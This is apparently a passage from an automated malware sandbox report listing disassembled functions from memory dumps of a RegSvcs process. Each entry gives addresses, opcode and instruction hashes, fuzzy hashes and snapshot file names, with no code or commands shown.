                                                                  • Opcode ID: 09980b7a06ab8c3e6663b8248e23ae0eb0dc25fe606de1ecdd411e87ae87d2fc
                                                                  • Instruction ID: d7dffe6ef7d939d019e8041e15f6aa0edee532b4844f78d69b1fb8e6442e9b0d
                                                                  • Opcode Fuzzy Hash: 09980b7a06ab8c3e6663b8248e23ae0eb0dc25fe606de1ecdd411e87ae87d2fc
                                                                  • Instruction Fuzzy Hash: DE41AF70E4060ADFDB94DF64C9546AFBFB6BF85300F11492AD802EB290EB74D846CB95
                                                                  Function 06052290 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHjq
                                                                  • API String ID: 0-751881793
                                                                  • Opcode ID: adc4488c6b92aaf8f8e3e35a94bab01c3e7a1b75d6f583f031b2f0d02117479c
                                                                  • Instruction ID: c04cd627c4c371edb7170775e0c28b78f4cda5661563c249771d95aea1a68c54
                                                                  • Opcode Fuzzy Hash: adc4488c6b92aaf8f8e3e35a94bab01c3e7a1b75d6f583f031b2f0d02117479c
                                                                  • Instruction Fuzzy Hash: DE31F031B002048FCB98AB38C95466F7BE6FFC8200F118429D806DB399DE35DE46CB91
                                                                  Function 06058340 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq
                                                                  • API String ID: 0-2886413773
                                                                  • Opcode ID: 682c7ba93ae1133ae078aa44440ed07726b2b688aa704dfd250f95d2adc08505
                                                                  • Instruction ID: ad64b4e23136a55b0eabeab583f3282eb78a3ab37a804b2fbad51009b4957091
                                                                  • Opcode Fuzzy Hash: 682c7ba93ae1133ae078aa44440ed07726b2b688aa704dfd250f95d2adc08505
                                                                  • Instruction Fuzzy Hash: 6DF0AF36A802248FDFA8AE49EA816AE7BF5EB40311F12C039DD05D7245D635DA85CB51
                                                                  Function 06056268 Relevance: .2, Instructions: 229COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da498452cc47cf5c157a7e7805ec97b85e15a07ec4c714e23b8d0f362980e11c
                                                                  • Instruction ID: d36849cbee41a2c221d1e545e2c72039b9e7825f107d63a8553e8b2049a179e5
                                                                  • Opcode Fuzzy Hash: da498452cc47cf5c157a7e7805ec97b85e15a07ec4c714e23b8d0f362980e11c
                                                                  • Instruction Fuzzy Hash: 1761C271F505114BCB94AA6EC88466FBADBEFC4620B564039E80ADB378DE76DD0287C1
                                                                  Function 06054341 Relevance: .2, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6832748c77269a05e9cbd5ee9032b87acd9acc47610a93e4adfb14067c4950e5
                                                                  • Instruction ID: 516ea99776aef2b6095cc97f16736243e3d34cc11aa7d4cea14e7cd91e72496e
                                                                  • Opcode Fuzzy Hash: 6832748c77269a05e9cbd5ee9032b87acd9acc47610a93e4adfb14067c4950e5
                                                                  • Instruction Fuzzy Hash: DB815230B502098BDF94DFA9D5547AE7BF6AF84300F118529D80ADB358EB34DC868B51
                                                                  Function 06054660 Relevance: .2, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e4f7f4fcfe771ad4d970ac7498d2e53d7af21d78dbb0d5bb3412c9090936cf82
                                                                  • Instruction ID: cf69e10f899ea7dd5f3be8d7cffec7ae3f04ddcdf809636f684b19f454d6aedb
                                                                  • Opcode Fuzzy Hash: e4f7f4fcfe771ad4d970ac7498d2e53d7af21d78dbb0d5bb3412c9090936cf82
                                                                  • Instruction Fuzzy Hash: 8B915030E002198FDF50DF68C950BDEBBB1FF89310F208699D549AB395DB70AA85CB91
                                                                  Function 06054678 Relevance: .2, Instructions: 210COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3458962840cc10864d27b79389bc4363291729d9ae5405b51ebab0343b5f46f8
                                                                  • Instruction ID: e14335a088a5ca40bf554fde5e1aee0c3e22d69566898fc0202292b6c8e1dbe6
                                                                  • Opcode Fuzzy Hash: 3458962840cc10864d27b79389bc4363291729d9ae5405b51ebab0343b5f46f8
                                                                  • Instruction Fuzzy Hash: 1E914D30E102198BDF60DF68C850BDEB7B1FF89310F208699D549AB355DB70AA85CF91
                                                                  Function 0605EB98 Relevance: .2, Instructions: 201COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2389388a9db57f4fcde20420807ae9c012ebbdbaf4f84d5e663aba0bdc98be44
                                                                  • Instruction ID: d80836c1c2e4c6fde0a1777936ddbdd412622da35f459c42884b37eb2eac678e
                                                                  • Opcode Fuzzy Hash: 2389388a9db57f4fcde20420807ae9c012ebbdbaf4f84d5e663aba0bdc98be44
                                                                  • Instruction Fuzzy Hash: C8711970A002089FDB94DFA9D990A9EBBF6FF84300F258529E455EB359DB30ED46CB50
                                                                  Function 0605EB89 Relevance: .2, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b0aa0da653d10c89649520c054d198256cc0655c1b75522f5040c080a09a1373
                                                                  • Instruction ID: b157b8f77c7fff2bb55a1d8c0e8985953e5a627d406c57d35dbb6852b9144ea4
                                                                  • Opcode Fuzzy Hash: b0aa0da653d10c89649520c054d198256cc0655c1b75522f5040c080a09a1373
                                                                  • Instruction Fuzzy Hash: 96711A71E002089FDB94DBA8D990A9EBBF6FF84300F258529D455EB359DB30ED46CB50
                                                                  Function 0605FCF7 Relevance: .2, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2e6d02644b1090557f310682ce6a6f1cf9b3ba3000bb20696c8aaf094082e61e
                                                                  • Instruction ID: bfa318b8108c4e80e52f713cc4136f41183a6e4a70d4b8c3b9ae5fb81d1b5292
                                                                  • Opcode Fuzzy Hash: 2e6d02644b1090557f310682ce6a6f1cf9b3ba3000bb20696c8aaf094082e61e
                                                                  • Instruction Fuzzy Hash: 7851F331E4020ADFCF54EB78E9446AEBBB2FF85310F11882AE506D7255EB398845CF81
                                                                  Function 0605FAA9 Relevance: .2, Instructions: 167COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 675259117ee704963106c340fbd3f3da381dbabba79db0d78877ad5f88f92fef
                                                                  • Instruction ID: 1fa1eab7ca567d617688440ae68d821d7881eed58d8ec49ffffa52aac49a894e
                                                                  • Opcode Fuzzy Hash: 675259117ee704963106c340fbd3f3da381dbabba79db0d78877ad5f88f92fef
                                                                  • Instruction Fuzzy Hash: 0751AA70B502059BFF90666CDA5476F3E9ED789310F114836ED0AC33A9DA6CCC558B91
                                                                  Function 0605FAB8 Relevance: .2, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 03e67d591d272076f32ffb0311be4d064d83871bb5fbd1938315324c3ae78f9a
                                                                  • Instruction ID: df2332ad6201be602bfd0dc4924886fc7410904bc7132f0a73087cfeaf677abc
                                                                  • Opcode Fuzzy Hash: 03e67d591d272076f32ffb0311be4d064d83871bb5fbd1938315324c3ae78f9a
                                                                  • Instruction Fuzzy Hash: 0151CB70B502068BFF90666CDA5476F2EDED789310F214836ED0AC33ADDA6CCC458B91
                                                                  Function 060554B8 Relevance: .1, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1413b57bec6459d2fc61500467ace40c076432a60a5bb6a0f634ebff6471261
                                                                  • Instruction ID: 9b1509c237a68cc5cfe96e474d3ad068c762f69e23ad87ee0cca319cbf233203
                                                                  • Opcode Fuzzy Hash: a1413b57bec6459d2fc61500467ace40c076432a60a5bb6a0f634ebff6471261
                                                                  • Instruction Fuzzy Hash: 9A418E72E406098FDFB1CEA9DC81AAFBBF2EB84310F11492AD516D7640D730E9458B91
                                                                  Function 06052140 Relevance: .1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff27933c325d4547d67dbfdbf57b1968e7922754e119593be8d1e1db8ece3c3b
                                                                  • Instruction ID: 9b09bee2b6d68b51b4279bfd1ea3f118b4ad3e1366472433a370cbb1f51a60fe
                                                                  • Opcode Fuzzy Hash: ff27933c325d4547d67dbfdbf57b1968e7922754e119593be8d1e1db8ece3c3b
                                                                  • Instruction Fuzzy Hash: DB317C35E10209ABCB59CF65C995A9FBBF6FF89300F108929E805EB354DB71AD42CB50
                                                                  Function 06052150 Relevance: .1, Instructions: 91COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 63dfcb98b2327b9fab498cec8f4c9ebc7f5936a3c5fe7c79b676e86698576788
                                                                  • Instruction ID: fcae288fa77a7745b961984ad679bf1be02f539325c42d9fa7367cc9ab357c6c
                                                                  • Opcode Fuzzy Hash: 63dfcb98b2327b9fab498cec8f4c9ebc7f5936a3c5fe7c79b676e86698576788
                                                                  • Instruction Fuzzy Hash: 3F318F35E10209ABCB59CF65D994A9FBBF6FF88300F108929E806E7354DB71AD42CB50
                                                                  Function 06053B41 Relevance: .1, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd68e8cfd5bdee360fd13973b420065922bf8c1e8341c9b6eda1548a6299f036
                                                                  • Instruction ID: 5de5ba47b589bee95fe399973e72319c83f569168f005b4c4c5381991f711f24
                                                                  • Opcode Fuzzy Hash: bd68e8cfd5bdee360fd13973b420065922bf8c1e8341c9b6eda1548a6299f036
                                                                  • Instruction Fuzzy Hash: 3A21ED76F112149FDB84DFA8E881BAEBBF1EB88350F018025E905E7354E738D8408B90
                                                                  Function 06053B50 Relevance: .1, Instructions: 78COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c36d8b413b28af90a5cd60aecc1cd9a85348bcebc3a580b72fdd6cbd81be2aba
                                                                  • Instruction ID: 233fb036113a0388d5fba36cb985ca8ed4340f245957ae07a8a84beb0c65b7d8
                                                                  • Opcode Fuzzy Hash: c36d8b413b28af90a5cd60aecc1cd9a85348bcebc3a580b72fdd6cbd81be2aba
                                                                  • Instruction Fuzzy Hash: A921AC76F112159FDB84DFA9E980BAEBBF1FB88790F118025E905E7354E734D8408B94
                                                                  Function 008ED030 Relevance: .1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313443532.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_8ed000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a90d9f6c46c40edf2ea2a16b91319f9005425d6914b11fb31aa9c669a38800d
                                                                  • Instruction ID: 60ad75149ded6893c1237a3b387fd04e2dcf4fe1a809c19b46bbcfdbf4004ff4
                                                                  • Opcode Fuzzy Hash: 2a90d9f6c46c40edf2ea2a16b91319f9005425d6914b11fb31aa9c669a38800d
                                                                  • Instruction Fuzzy Hash: 37212271504784DFCB14DF14D980B26BBA5FB85318F28C569D8098B396C33AD80ACA62
                                                                  Function 06053C60 Relevance: .1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57af4e5379fd00e9eb200b9c8978859b8b4efd1d0e2853fd93a2336ce5b84d7d
                                                                  • Instruction ID: c067294d4df1b4eab8cb52f5df94df6ce48d1d6814e44f818c2f02ddd86183a1
                                                                  • Opcode Fuzzy Hash: 57af4e5379fd00e9eb200b9c8978859b8b4efd1d0e2853fd93a2336ce5b84d7d
                                                                  • Instruction Fuzzy Hash: 3611A132B141294BDF99DA68D9146AF7BEAEBC8250F018539D806E7354EF75DC018BD0
                                                                  Function 060542A0 Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 891d02f6b526b0e5153cdc05e9d62429558b6d222fb11863b20923344b106b2b
                                                                  • Instruction ID: 0e4fad455b3d4c6a8dc8f6cd3e2173c3f402b530b405d2d7a94f52b7dc15117b
                                                                  • Opcode Fuzzy Hash: 891d02f6b526b0e5153cdc05e9d62429558b6d222fb11863b20923344b106b2b
                                                                  • Instruction Fuzzy Hash: 86014235B001141BCBA0957DD855B6FBBEAEBC8320F108439FA0AC7354EE24DC428391
                                                                  Function 0605EE08 Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e87d14331d07725d0b261b04bb6607855e0381988b64257103786ed37731b072
                                                                  • Instruction ID: 010a30397b5aac6eb5793de0678fd29b0faa00efd6241328c2ad8f3144f59f72
                                                                  • Opcode Fuzzy Hash: e87d14331d07725d0b261b04bb6607855e0381988b64257103786ed37731b072
                                                                  • Instruction Fuzzy Hash: 1301F735B241154BCBA5997DD461B2B7BEADBC5610F108839F94AC7340FE14DD028781
                                                                  Function 06053918 Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5d42447eecd05faea1d1bc7777fdad4879f8a863d1a58bf0d77ce3915e76bef
                                                                  • Instruction ID: 0f07219d15c619b2d02e33abefe43b300b197229edee7c02f9f61b6d719a687b
                                                                  • Opcode Fuzzy Hash: b5d42447eecd05faea1d1bc7777fdad4879f8a863d1a58bf0d77ce3915e76bef
                                                                  • Instruction Fuzzy Hash: 0321C2B1D01259AFCB00DF9AD885ADEFFB4FB49310F50812AE918B7240D378A544CFA5
                                                                  Function 008ED02B Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313443532.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_8ed000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                  • Instruction ID: 558073c6b8a842d5509a33b8f8947386c9bf66016ebcdf438c7aa760da07fe3f
                                                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                  • Instruction Fuzzy Hash: 7A11BB75504780CFCB12CF14D5C4B15FBA1FB85314F28C6AAD8498B696C33AD84ACB62
                                                                  Function 06053C4F Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 06b20554bc12927159f1258898b05d33004f80826249e1a8c70c2d0514982bcb
                                                                  • Instruction ID: bc1c967d25aa82a4740fa7f54e5b9423fd0a3dd58654af18cf8861035443a3e7
                                                                  • Opcode Fuzzy Hash: 06b20554bc12927159f1258898b05d33004f80826249e1a8c70c2d0514982bcb
                                                                  • Instruction Fuzzy Hash: 5B012832B140290BDB999578CC147AF7AEEDBC8200F054439D806D3284FE258C0147D0
                                                                  Function 06053920 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7f71eee3b5581be0be2eb5f308796f29fb588186c612f1ff0acc6c27deec978d
                                                                  • Instruction ID: 035f3e94f7b815224b4d77e705fdcda6fe932f318a7fd1a94695d4335868a0d7
                                                                  • Opcode Fuzzy Hash: 7f71eee3b5581be0be2eb5f308796f29fb588186c612f1ff0acc6c27deec978d
                                                                  • Instruction Fuzzy Hash: 3511B3B5D01259AFCB10DF9AD884ADEFFB4FB49310F50812AE918B7240D378A554CFA5
                                                                  Function 060542B0 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 491240e23b1d587c498c92b1ee9bd3edef73d0953db9092b0c69c224013919cc
                                                                  • Instruction ID: 0bd4a5b49085766f027337d520435e344bddb0c6216a376dc36ea873af5f33e3
                                                                  • Opcode Fuzzy Hash: 491240e23b1d587c498c92b1ee9bd3edef73d0953db9092b0c69c224013919cc
                                                                  • Instruction Fuzzy Hash: 1D01D134B001141BDBA4996D9454B6FBBEAEBC8720F108439E60AC7354EE65DC428395
                                                                  Function 0605A377 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a098e3676b7a0e32324bf8d8e2699f0c005c2199b4921004f442c5918952414
                                                                  • Instruction ID: 37f009b2b65731e64b65668e3a2a842ba484bb8a1b102c23edbd5a065d25b672
                                                                  • Opcode Fuzzy Hash: 2a098e3676b7a0e32324bf8d8e2699f0c005c2199b4921004f442c5918952414
                                                                  • Instruction Fuzzy Hash: 57016D35B100144FDBA1EA6CE95572F7BE6EB89724F108938F50AC7358EE29EC428790
                                                                  Function 0605EE18 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8d2ec49e4c4659af8da5022325b79001851f26a4bdea423f4197f95bb357e8cf
                                                                  • Instruction ID: 943765f742961c78917b1190428b7fc2dd9eaa281bb6854e50130bfe5bb1a5e7
                                                                  • Opcode Fuzzy Hash: 8d2ec49e4c4659af8da5022325b79001851f26a4bdea423f4197f95bb357e8cf
                                                                  • Instruction Fuzzy Hash: 06018135B201155BCBA5992DD451B2F6BDADBC9620F108839E54AC7344FE25DD024785
                                                                  Function 0605A388 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9d90b2766c7136b88e385e8964a312320883a8d039af1b9a716cd63a38fae343
                                                                  • Instruction ID: 6a439f0c0678fb69390a3759da5466d17e25797d5ce0a043c61fbb2a9c246825
                                                                  • Opcode Fuzzy Hash: 9d90b2766c7136b88e385e8964a312320883a8d039af1b9a716cd63a38fae343
                                                                  • Instruction Fuzzy Hash: 2D018130B100144FCBA1EA6DE854B2F7BEAEB85724F108528F50AC7344EE25EC428791
                                                                  Function 0605C850 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bce0f983710e4eb2661942496e46d74eed7df044de3e317182af01286272b78
                                                                  • Instruction ID: f481cdc3e49c7ffb3472d165e5d3979beb66d071b01b9b04317659abcd557f6c
                                                                  • Opcode Fuzzy Hash: 9bce0f983710e4eb2661942496e46d74eed7df044de3e317182af01286272b78
                                                                  • Instruction Fuzzy Hash: 6101F932E112149BDF54AA69F841AAEBBB5FBC4314F00843DE901DB344EB319D448BC1
                                                                  Function 060564E8 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0237caa2fdba1c834f08d7869a56128c3bcf013905b99d9b440f7cdff1e9a0bc
                                                                  • Instruction ID: 701a835088525e21a94fe3d19d4b52ccce56625d3bbac0b24cc5b223b231bd98
                                                                  • Opcode Fuzzy Hash: 0237caa2fdba1c834f08d7869a56128c3bcf013905b99d9b440f7cdff1e9a0bc
                                                                  • Instruction Fuzzy Hash: FBE04871DA41496FEF90CA70C90976B7BFDD702214F9185A4D904C7242F177CD418790

                                                                  Non-executed Functions

                                                                  Function 06057710 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3810553869
                                                                  • Opcode ID: 8ae9104c870abe74bcba238204eb09fbc2c3a2f4db4960ed34148d2e469970f5
                                                                  • Instruction ID: ac45c8ab0759ccb9bc3ea4a9f46cae9e8424dec2674d55fc85fcdf576ad0e34f
